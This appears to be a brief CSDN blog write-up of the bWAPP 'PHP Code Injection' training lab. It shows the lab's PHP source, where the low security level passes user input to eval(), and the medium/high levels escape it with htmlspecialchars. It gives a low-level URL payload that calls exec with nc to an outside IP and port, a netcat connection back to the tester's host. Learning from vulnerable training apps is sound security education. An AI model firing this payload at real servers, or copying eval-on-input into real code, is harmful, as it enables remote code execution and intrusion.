bWAPP--PHP Code Injection

bWAPP–PHP Code Injection

<?php

if(isset($_REQUEST["message"]))
{

    // If the security level is not MEDIUM or HIGH
    if($_COOKIE["security_level"] != "1" && $_COOKIE["security_level"] != "2")
    {

?>
    <p><i><?php @eval ("echo " . $_REQUEST["message"] . ";");?></i></p>

  • low

    http://127.0.0.1/phpi.php?message=exec("nc 192.168.80.2 4444")
    
  • mid/high

    无法绕过

    <?php
    
        }
    
        // If the security level is MEDIUM or HIGH
        else
        {
    ?>
        <p><i><?php echo htmlspecialchars($_REQUEST["message"], ENT_QUOTES, "UTF-8");;?></i></p>
    
    <?php
    
        }
    
    }
    
    ?>
    
©️2020 CSDN 皮肤主题: 游动-白 设计师:上身试试 返回首页